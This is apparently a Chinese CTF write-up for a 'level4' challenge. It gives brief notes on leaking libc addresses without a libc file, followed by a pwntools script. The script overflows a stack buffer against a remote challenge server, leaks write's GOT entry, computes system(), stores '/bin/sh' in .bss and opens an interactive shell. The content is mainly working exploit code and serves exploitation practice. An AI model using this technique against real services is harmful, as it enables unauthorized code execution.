这道题在没libc的情况下考泄露地址,两个方法,一个read之后直接pop三个栈参数再返回system,另一个重新返回vulnerable,只不过read(8字节),所以是send,不是sendline啊
另外一个大坑点在dynelf的使用,只能通过它泄漏偏移,然后用不带它的再写一遍
传说中的不用libc的另一方法http://www.cnblogs.com/wangaohui/p/5123992.html
from pwn import *
p=remote('218.2.197.235',20433)elf=ELF('./level4')
write_plt=elf.symbols['write']
read_plt=elf.symbols['read']
vul=0x0804844B
bss=0x0804A024
def leak(add):
payload='A'*(0x88+4)+p32(write_plt)+p32(vul)+p32(1)+p32(add)+p32(4)
p.sendline(payload)
addc=p.recv(4)
return addc
#d = DynELF(leak, elf=ELF('./level4'))
#system_addr = d.lookup('system', 'libc')
#print "system_addr=" + hex(system_addr)
#payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
#p.sendline(payload)
#p.sendline('/bin/sh\0')
#payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
#p.sendline(payload)
#p.interactive()
wr=leak(elf.got['write'])
offset=-0x8ab00
system_addr=u32(wr)+offset
#pppr = 0x08048509
#payload='A'*(0x88+4)+p32(read_plt)+p32(pppr)+p32(0)+p32(bss)+p32(8)+p32(system_addr) + p32(vulfun_addr) + p32(bss)
#p.sendline(payload)
#p.send("/bin/sh\0")
payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
p.sendline(payload)
p.send('/bin/sh\0')
payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
p.sendline(payload)
p.interactive()